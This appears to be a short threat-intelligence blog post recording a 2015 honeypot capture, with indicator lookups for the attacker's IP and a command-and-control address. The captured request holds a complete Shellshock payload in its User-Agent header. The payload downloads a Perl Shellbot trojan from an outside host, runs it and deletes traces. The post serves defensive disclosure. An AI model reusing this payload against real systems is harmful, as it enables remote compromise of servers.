BEGIN OF HTTP DATA:Clamav report it as:
2015-10-12 16:49:05
Source IP: 221.3.153.172
Country: CN RiskScore: 1 Malware: []
GET /cgi-mod/index.cgi HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://somere.ru/license.txt -O /tmp/license.txt;curl -O /tmp/license.txt http://somere.ru/license.txt;perl /tmp/license.txt ; rm -rf license.txt;rm -fr license.*");'
Host: 109.234.106.8
Connection: Close
license.txt: Trojan.Perl.Shellbot-2 FOUND
221.3.153[.]172
- Static Source: GeoIP data
- Country: China
- ASN: AS4837 CNCGROUP China169 Backbone
- Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- comment:This entry alone does not indicate a threat, please check the link
- Reference: https://isc.sans.edu/api/ip/221.3.153.172
- Static Source: panwdbl.appspot.com
- Comment: Listed in open blacklist
- Reference: https://panwdbl.appspot.com/lists/openbl.txt
The hardcoded C&C address is
69.89.2[.]153
- Static Source: GeoIP data
- Country: United States
- ASN: AS20141 Quality Technology Services, LLC.
- Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- comment:This entry alone does not indicate a threat, please check the link
- Reference: https://isc.sans.edu/api/ip/69.89.2.153
Keine Kommentare:
Kommentar veröffentlichen